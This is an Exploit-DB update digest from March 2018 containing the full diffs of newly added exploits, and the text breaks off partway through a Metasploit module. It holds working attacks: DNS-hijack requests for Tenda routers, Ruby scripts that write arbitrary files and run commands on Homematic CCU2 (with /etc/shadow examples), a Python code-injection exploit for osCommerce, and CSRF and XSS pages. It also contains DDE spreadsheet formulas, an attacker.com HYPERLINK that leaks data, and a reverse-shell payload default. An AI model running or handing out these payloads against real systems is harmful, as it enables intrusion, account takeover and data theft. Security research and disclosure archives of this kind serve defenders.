DB: 2018-03-31

23 changes to exploits/shellcodes

SysGauge 4.5.18 - Local Denial of Service
Systematic SitAware - NVG Denial of Service
Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH)
Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow
Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow
Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow

Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow

osTicket 1.10 - SQL Injection
osTicket 1.10 - SQL Injection (PoC)
Open-AuditIT Professional 2.1 - Cross-Site Request Forgery
Homematic CCU2 2.29.23 - Arbitrary File Write
MiniCMS 1.10 - Cross-Site Request Forgery
WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting
WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection
Homematic CCU2 2.29.23 - Remote Command Execution
Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
Joomla! Component AcySMS 3.5.0 - CSV Macro Injection
WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure
Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change
osCommerce 2.3.4.1 - Remote Code Execution
Tenda W316R Wireless Router 5.07.50 - Remote DNS Change
D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass
Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change
Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)
Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)

exploits/asp/webapps/44373.txt

@@ -0,0 +1,63 @@
+#
+#
+#  Tenda W308R v2 Wireless Router V5.07.48
+#  Cookie Session Weakness Remote DNS Change PoC
+#
+#
+#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
+#  https://ethical-hacker.org/
+#  https://facebook.com/ethicalhackerorg
+#
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#
+ 
+
+GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null

exploits/asp/webapps/44377.txt

@@ -0,0 +1,63 @@
+#
+#
+#  Tenda W316R Wireless Router V5.07.50
+#  Cookie Session Weakness Remote DNS Change PoC
+#
+#
+#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
+#  https://ethical-hacker.org/
+#  https://facebook.com/ethicalhackerorg
+#
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#
+ 
+
+GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null

exploits/asp/webapps/44380.txt

@@ -0,0 +1,62 @@
+#
+#
+#  Tenda W3002R/A302/w309r Wireless Router V5.07.64_en
+#  Cookie Session Weakness Remote DNS Change PoC
+#
+#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
+#  https://ethical-hacker.org/
+#  https://facebook.com/ethicalhackerorg
+#
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#
+ 
+
+GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null

exploits/asp/webapps/44381.txt

@@ -0,0 +1,62 @@
+#
+#
+#  Tenda FH303/A300 Firmware V5.07.68_EN
+#  Cookie Session Weakness Remote DNS Change PoC
+#
+#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
+#  https://ethical-hacker.org/
+#  https://facebook.com/ethicalhackerorg
+#
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#
+ 
+
+GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null

exploits/cgi/webapps/44361.rb

@@ -0,0 +1,81 @@
+#!/usr/bin/ruby
+
+# Exploit Title: Homematic CCU2 Arbitrary File Write
+# Date: 28-03-18
+# Exploit Author: Patrick Muench, Gregor Kopf
+# Vendor Homepage: http://www.eq-3.de
+# Software Link: http://www.eq-3.de/service/downloads.html?id=268
+# Version: 2.29.23
+# CVE : 2018-7300
+
+# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite
+
+require 'net/http'
+require 'net/https'
+require 'uri'
+require 'json'
+
+unless ARGV.length == 3
+  STDOUT.puts <<-EOF
+Please provide url
+
+Usage:
+  write_files.rb <ip.adress> <file path> <content of the file>
+
+Example:
+  write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
+
+  or
+
+  write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
+
+EOF
+  exit
+end
+
+# The first argument specifiee the URL and if http or https is used
+url = ARGV[0] + "/api/homematic.cgi"
+
+# The second argument specifies the file into which the content should be written
+homematic_file_path = ARGV[1]
+
+# The third argument specifies the content of the file
+homematic_file_content = ARGV[2]
+
+# define the json body for the attack
+body = {
+        "version": "1.1",
+        "method": "User.setLanguage",
+        "params": {
+                    "userName": "file path",
+                    "userLang": "file content"
+                  }
+        }.to_hash
+
+# define the traversal with the file you want to write
+body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"
+
+# define the content
+body[:params][:userLang] = homematic_file_content
+
+# split the uri to access it in a easier way
+uri = URI.parse(url)
+
+# define target connection, disabling certificate verification
+Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
+
+  # define post request
+  request = Net::HTTP::Post.new(uri.request_uri)
+
+  # define the content type of the http request
+  request.content_type = 'application/json'
+
+  # define the request body
+  request.body = body.to_json
+
+  # send the request to the homematic ccu2
+  response = http.request(request)
+
+  # print response message code and status to cli
+  puts 'Response code: ' + response.code + ' ' + response.message
+end

exploits/cgi/webapps/44368.rb

@@ -0,0 +1,61 @@
+#!/usr/bin/ruby
+
+# Exploit Title: Homematic CCU2 Remote Command Execution
+# Date: 28-03-18
+# Exploit Author: Patrick Muench, Gregor Kopf
+# Vendor Homepage: http://www.eq-3.de
+# Software Link: http://www.eq-3.de/service/downloads.html?id=268
+# Version: 2.29.23
+# CVE : 2018-7297
+
+# Description: http://atomic111.github.io/article/homematic-ccu2-remote-code-execution
+
+require 'net/http'
+require 'net/https'
+require 'uri'
+
+unless ARGV.length == 2
+  STDOUT.puts <<-EOF
+Please provide url and the command, which is execute on the homematic
+
+Usage:
+  execute_cmd.rb <ip.adress> <homematic command>
+
+Example:
+  execute_cmd.rb https://192.168.1.1 "cat /etc/shadow"
+
+  or
+
+  execute_cmd.rb http://192.168.1.1 "cat /etc/shadow"
+
+EOF
+  exit
+end
+
+# The first argument specifies the URL and if http or https is used
+url = ARGV[0] + "/Test.exe"
+
+# The second argument specifies the command which is executed via tcl interpreter
+tcl_command = ARGV[1]
+
+# define body content
+body = "string stdout;string stderr;system.Exec(\"" << tcl_command << "\", &stdout, &stderr);WriteLine(stdout);"
+
+# split uri to access it in a easier way
+uri = URI.parse(url)
+
+# define target connection, disabling certificate verification
+Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
+
+  # define post request
+  request = Net::HTTP::Post.new(uri.request_uri)
+
+  # define the request body
+  request.body = body
+
+  # send the request to the homematic ccu2
+  response = http.request(request)
+
+  # print response to cli
+  puts response.body
+end

exploits/multiple/webapps/44360.txt

@@ -0,0 +1,69 @@
+# Exploit Title: Open-AuditIT Professional 2.1 - Cross-Site Request Forgery (CSRF)
+# Date: 27-03-2018
+# Exploit Author: Nilesh Sapariya
+# Contact: https://twitter.com/nilesh_loganx
+# Website: https://nileshsapariya.blogspot.com
+# Vendor Homepage: https://www.open-audit.org/
+# Software Link  : https://www.open-audit.org/downloads.php
+# Version: 2.1
+# CVE : CVE-2018-8979
+# Tested on: Windows 10 Pro
+# Category: Webapp Open-AuditIT Professional 2.1
+
+
+1. Description:-
+There is no CSRF protection in Open-AuditIT application, with a little help
+of social engineering (like sending a link via email/chat) an attacker may
+force the victim to click on a malicious link by which any normal user can
+become an Admin user. The attack can force an end user to execute unwanted
+actions on a web application in which they're currently authenticated.
+Using this vulnerability, we were able to compromise entire user account
+with chaining this bug with XSS.
+
+
+
+2. Proof of Concept
+Login into Open-AuditIT Professional 2.1
+Step 1 :- Craft a HTML Page with XSS payload
+Step 2:- Save this .html file and send it to victim (Victim  should be
+loggedin in the browser)
+Crafted value will be added.
+
+
+Affected Code:
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/omk/open-audit/credentials"
+method="POST">
+      <input type="hidden" name="data&#91;attributes&#93;&#91;name&#93;"
+value="<img src=x onerror=alert('hacked');>" />
+      <input type="hidden"
+name="data&#91;attributes&#93;&#91;org&#95;id&#93;" value="1" />
+      <input type="hidden"
+name="data&#91;attributes&#93;&#91;description&#93;" value="CSRF" />
+      <input type="hidden" name="data&#91;attributes&#93;&#91;type&#93;"
+value="ssh" />
+      <input type="hidden"
+name="data&#91;attributes&#93;&#91;credentials&#93;&#91;username&#93;"
+value="test" />
+      <input type="hidden"
+name="data&#91;attributes&#93;&#91;credentials&#93;&#91;password&#93;"
+value="test" />
+      <input type="hidden" name="data&#91;type&#93;" value="credentials" />
+      <input type="hidden" name="submit" value="" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+​​3] POCs and steps:
+https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html
+
+
+Thanks & Regards,
+Nilesh Sapariya
+Security Researcher
+https://twitter.com/nilesh_loganx
+*https://nileshsapariya.blogspot.in

exploits/php/webapps/44362.html

@@ -0,0 +1,36 @@
+<--
+# Exploit Title:  MiniCMS 1.10 CSRF Vulnerability
+# Date: 2018-03-28
+# Exploit Author: zixian（me@zixian.org、zixian@5ecurity.cn）
+# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
+# Software Link: https://github.com/bg5sbk/MiniCMS
+# Version: 1.10
+# CVE : CVE-2018-9092
+
+
+
+There is a CSRF vulnerability that can change the administrator account password
+After the administrator logged in, open the following page
+ poc:
+-->
+
+ <html>
+ <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
+ <title>test</title>
+ <body>
+ <form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
+ <input type="hidden" name="site_name" value="hack123" />  
+ <input type="hidden" name="site_desc" value="hacktest" />  
+ <input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
+ <input type="hidden" name="user_nick" value="hack" />  
+ <input type="hidden" name="user_name" value="admin" />  
+ <input type="hidden" name="user_pass" value="hackpass" />  
+ <input type="hidden" name="comment_code" value="" />  
+ <input type="hidden" name="save" value=" " /> 
+ </form>
+ <script>
+  document.forms[0].submit();
+ </script>
+ </body>
+ </head>
+ </html>

exploits/php/webapps/44366.txt

@@ -0,0 +1,46 @@
+# Exploit Title : Relevanssi Wordpress Search Plugin Reflected Cross Site Scripting (XSS)
+# Date: 23-03-2018 
+# Exploit Author : Stefan Broeder
+# Contact : https://twitter.com/stefanbroeder
+# Vendor Homepage: https://www.relevanssi.com
+# Software Link: https://wordpress.org/plugins/relevanssi
+# Version: 4.0.4
+# CVE : CVE-2018-9034
+# Category : webapps
+
+Description
+===========
+Relevanssi is a WordPress plugin with more than 100.000 active installations. Version 4.0.4 (and possibly previous versions) are affected by a Reflected XSS vulnerability.
+
+Vulnerable part of code
+=======================
+File: relevanssi/lib/interface.php:1055 displays unescaped value of $_GET variable 'tab'.
+
+..
+1049 if( isset( $_REQUEST[ 'tab' ] ) ) { 
+1050 $active_tab = $_REQUEST[ 'tab' ]; 
+1051 } // end if 
+1052
+1053 if ($active_tab === "stopwords") $display_save_button = false; 
+1054
+1055 echo "<input type='hidden' name='tab' value='$active_tab' />"; 
+..
+
+Impact
+======
+Arbitrary JavaScript code can be run on browser side if a logged in WordPress administrator is tricked to click on a link or browse a URL under the attacker control.
+This can potentially lead to creation of new admin users, or remote code execution on the server.
+
+Proof of Concept
+============
+In order to exploit this vulnerability, the attacker needs to have the victim visit the following link:
+
+/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab='><SCRIPT>var+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)<%2FSCRIPT><BR+
+
+Please note that quotes and double quotes are properly escaped by WordPress, however javascript escaping (\) is applied while the value is in an HTML attribute. There, escaping a quote by \' has no effect (&quot should be used). This allows us to break out of the HTML attribute and start the script tag. Within the script, quotes are properly escaped but there are ways to obfuscate javascript without requiring these symbols as can be seen in above payload.
+
+
+Solution
+========
+
+Update to version 4.1

exploits/php/webapps/44367.txt

@@ -0,0 +1,40 @@
+# Exploit Title : Contact Form 7 to Database Extension Wordpress Plugin CSV Injection
+# Date: 23-03-2018 
+# Exploit Author : Stefan Broeder
+# Contact : https://twitter.com/stefanbroeder
+# Vendor Homepage: None
+# Software Link: https://wordpress.org/plugins/contact-form-7-to-database-extension
+# Version: 2.10.32
+# CVE : CVE-2018-9035
+# Category : webapps
+
+Description
+===========
+Contact Form 7 to Database Extension is a WordPress plugin with more than 400.000 active installations. Development is discontinued since 1 year. Version 2.10.32 (and possibly previous versions) are affected by a CSV Injection vulnerability.
+
+Vulnerable part of code
+=======================
+File: contact-form-7-to-database-extension/ExportToCsvUtf8.php:135 prints value of column without checking if it contains a spreadsheet formula.
+
+Impact
+======
+Arbitrary formulas can be injected into CSV/Excel files. 
+This can potentially lead to remote code execution at the client (DDE) or data leakage via maliciously injected hyperlinks.
+
+Proof of Concept
+============
+In order to exploit this vulnerability, the attacker needs to insert an Excel formula into any of the contact form fields available. This will end up in the log, and if a WordPress administrator chooses to export this log as Excel/CSV file, the file will contain the formula. If he then opens the file, the formula will be calculated. 
+
+Example:
+
+=cmd|'/C calc.exe'!Z0
+
+or
+
+=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")
+
+
+Solution
+========
+
+The plugin should escape fields starting with '=' when it exports data to CSV or Excel formats.

exploits/php/webapps/44369.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Joomla! Component Acymailing Starter 5.9.5 CSV Macro
+Injection
+# Google Dork: N/A
+# Date: 22-03-2018
+################################
+# Exploit Author: Sureshbabu Narvaneni
+################################
+# Vendor Homepage: https://www.acyba.com
+# Software Link: https://extensions.joomla.org/extension/acymailing-starter/
+# Affected Version: 5.9.5
+#Category: WebApps
+# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
+# CVE : CVE-2018-9107
+
+1. Vendor Description:
+
+AcyMailing is a reliable Newsletter and email marketing extension for
+Joomla.
+It enables you to efficiently manage an unlimited number of subscribers,
+organize them into mailing lists, send personalized newsletters (Hi
+{name}...)
+
+2. Technical Description:
+
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+the export feature in the Acyba AcyMailing extension before 5.9.6 for
+Joomla! via a value that is mishandled in a CSV export.
+
+3. Proof Of Concept:
+
+Login as low privileged user who is having access to Acymailing Component.
+Rename user name as @SUM(1+1)*cmd|' /C calc'!A0.
+
+When high privileged user logged in and exported user data then the CSV
+Formula gets executed and calculator will get popped in his machine.
+
+4. Solution:
+
+Upgrade to version 5.9.6
+https://extensions.joomla.org/extension/acymailing-starter/
+
+5. Reference:
+https://github.com/MrR3boot/CVE-Hunting/blob/master/AcyStarter-CSV.mp4
+https://vel.joomla.org/articles/2140-introducing-csv-injection
+
+Sureshbabu Narvaneni,
+Security Analyst | Bug Hunter,
+HackerOne (mrreboot/mrr3boot) | BugCrowd (Mr_R3boot)

exploits/php/webapps/44370.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Joomla! Component AcySMS 3.5.0 CSV Macro Injection
+# Google Dork: N/A
+# Date: 22-03-2018
+################################
+# Exploit Author: Sureshbabu Narvaneni
+################################
+# Vendor Homepage: https://www.acyba.com
+# Software Link: https://extensions.joomla.org/extensions/extension/communication/phone-a-sms/acysms/
+# Affected Version: 3.5.0
+# Category: WebApps
+# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
+# CVE : CVE-2018-9106
+
+1. Vendor Description:
+
+AcySMS is a component which enables you to send follow-up campaigns,
+auto-responders, newsletters, promotions, special offers, automated
+messages... via SMS/Text Messages.
+
+2. Technical Description:
+
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+the export feature in the Acyba AcySMS extension before 3.5.1 for Joomla!
+via a value that is mishandled in a CSV export.
+
+3. Proof Of Concept:
+
+Login as low privileged user who is having access to AcySMS Component.
+Rename user name as @SUM(1+1)*cmd|' /C calc'!A0.
+
+When high privileged user logged in and exported user data then the CSV
+Formula gets executed and calculator will get popped in his machine.
+
+4. Solution:
+
+Upgrade to version 3.5.1
+https://extensions.joomla.org/extensions/extension/communication/phone-a-sms/acysms/
+
+
+5. Reference:
+
+https://vel.joomla.org/articles/2140-introducing-csv-injection
+https://github.com/MrR3boot/CVE-Hunting/blob/master/AcySMS-CSV.mp4
+
+
+
+Sureshbabu Narvaneni,
+Security Analyst | Bug Hunter,
+HackerOne (mrreboot/mrr3boot) | BugCrowd (Mr_R3boot)

exploits/php/webapps/44371.txt

@@ -0,0 +1,26 @@
+# Exploit Title: WP Security Audit Log Plugin, Sensitive Information Disclosure <= 3.1.1 
+# Google Dork: inurl:/wp-content/uploads/wp-security-audit-log/
+# Date: 3/13/2018
+# Exploit Author: Colette Chamberland, Defiant, Inc.
+# Vendor Homepage: http://wpwhitesecurity.com
+# Software Link: https://wordpress.org/plugins/wp-security-audit-log/
+# Version: <=3.1.1
+# Tested on: Wordpress 4.9.x
+# CVE : CVE-2018-8719
+
+Description:
+No protection on the wp-content/uploads/wp-security-audit-log/*
+which is indexed by google and allows for attackers to possibly find user information (bad login attempts)
+
+/wp-security-audit-log/classes/Sensors/System.php':
+$upload_dir = wp_upload_dir();
+$uploads_dir_path = trailingslashit( $upload_dir['basedir'] ) . 'wp-security-audit-log/404s/users/';
+$uploads_url = trailingslashit( $upload_dir['baseurl'] ) . 'wp-security-audit-log/404s/users/';
+
+/wp-security-audit-log/classes/Sensors/LogInOut.php':
+// Directory for logged in users log files.
+		$user_upload_dir    = wp_upload_dir();
+		$user_upload_path   = trailingslashit( $user_upload_dir['basedir'] . '/wp-security-audit-log/failed-logins/' );
+		if ( ! $this->CheckDirectory( $user_upload_path ) ) {
+			wp_mkdir_p( $user_upload_path );
+		}

exploits/php/webapps/44374.py

@@ -0,0 +1,40 @@
+# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
+# Date: 29.0.3.2018
+# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
+# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
+# Tested on: Linux, Windows
+
+# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
+# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
+# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
+# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
+# PHP code into the config file and then simply executing the code by opening it.
+
+
+import requests
+
+# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
+base_url = "http://localhost//oscommerce-2.3.4.1/catalog/"
+target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"
+
+data = {
+    'DIR_FS_DOCUMENT_ROOT': './'
+}
+
+# the payload will be injected into the configuration file via this code
+# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
+# so the format for the exploit will be: '); PAYLOAD; /*
+
+payload = '\');'
+payload += 'system("ls");'    # this is where you enter you PHP payload
+payload += '/*'
+
+data['DB_DATABASE'] = payload
+
+# exploit it
+r = requests.post(url=target_url, data=data)
+
+if r.status_code == 200:
+    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
+else:
+    print("[-] Exploit did not execute as planned")

exploits/php/webapps/44378.txt

@@ -0,0 +1,26 @@
+# Exploit Title: D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Route Authentication Bypass
+# CVE: CVE-2018-9032
+# Date: 24-03-2018
+# Exploit Author: Gem George
+# Author Contact: https://www.linkedin.com/in/gemgrge
+# Vulnerable Product: D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router http://www.dlink.co.in/products/?pid=628
+# Firmware version: 1.02-2.06
+# Hardware version: A1, B1
+# Vendor Homepage: https://dlink.com
+
+
+Vulnerability Details
+======================
+An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router potentially allows attackers to bypass SharePort Web Access Portal by directly accessing authenticated pages such as /category_view.php or /folder_view.php. This could potentially allow unauthorized remote access of media stored in SharePort and may perform write operation in the portal
+
+How to exploit
+===================
+Directly call authenticated URLs to bypass authentication
+
+Examples:
+* http://[router_ip][port]/category_view.php
+* http://[router_ip][port]/folder_view.php
+
+POC
+=========
+* https://youtu.be/Wmm4p8znS3s

exploits/php/webapps/44379.rb

@@ -0,0 +1,261 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload',
+      'Description' => %q{
+      Vtiger 6.3.0 CRM's administration interface allows for the upload of
+a company logo.
+      Instead of uploading an image, an attacker may choose to upload a
+file containing PHP code and
+      run this code by accessing the resulting PHP file.
+
+      This module was tested against vTiger CRM v6.3.0.
+      },
+      'Author' =>
+        [
+            'Benjamin Daniel Mussler', # Discoverys
+        'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+            ['CVE', '2015-6000'],
+        ['CVE','2016-1713'],
+            ['EDB', '38345']
+        ],
+       'DefaultOptions' =>
+          {
+            'SSL'     => false,
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+            'Encoder' => 'php/base64'
+          },
+      'Privileged' => false,
+      'Platform'   => ['php'],
+      'Arch'       => ARCH_PHP,
+      'Targets' =>
+        [
+          [ 'vTiger CRM v6.3.0', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 28 2015'))
+
+      register_options(
+        [
+            OptString.new('TARGETURI', [ true, "Base vTiger CRM directory
+path", '/']),
+            OptString.new('USERNAME', [ true, "Username to authenticate
+with", 'admin']),
+            OptString.new('PASSWORD', [ true, "Password to authenticate
+with", 'password'])
+        ])
+
+      # Some PHP version uses php_short_code=ON
+      register_advanced_options(
+        [
+            OptBool.new('PHPSHORTTAG', [ false, 'Set a short_open_tag
+option', false ])
+        ], self.class)
+  end
+
+  def check
+    res = nil
+    begin
+      res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,
+'index.php') })
+    rescue
+      vprint_error("Unable to access the index.php file")
+      return CheckCode::Unknown
+    end
+
+    if res and res.code != 200
+      vprint_error("Error accessing the index.php file")
+      return CheckCode::Unknown
+    end
+
+    if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\/small>/i
+      vprint_status("vTiger CRM version: " + $1)
+      case $1
+      when '6.3.0'
+      return Exploit::CheckCode::Vulnerable
+      else
+        return CheckCode::Detected
+      end
+    end
+
+    return CheckCode::Safe
+  end
+
+
+  # Login Function.
+  def login
+      # Dummy Request for grabbing CSRF token and PHPSESSION ID
+      res = send_request_cgi({
